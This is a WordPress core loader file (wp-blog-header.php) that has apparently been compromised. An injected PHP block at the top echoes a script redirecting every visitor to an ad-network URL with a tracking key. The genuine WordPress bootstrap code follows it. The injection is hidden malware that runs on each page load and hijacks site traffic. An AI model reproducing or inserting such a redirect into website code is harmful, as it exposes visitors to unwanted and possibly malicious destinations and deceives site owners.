<?php
echo '<head><script type="text/javascript">window.location.href = "https://www.profitablecpmrate.com/p4cpj2n8s?key=8fbf3b76933ef1668010630b3c52e4d1";</script></head>';?>
<?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}
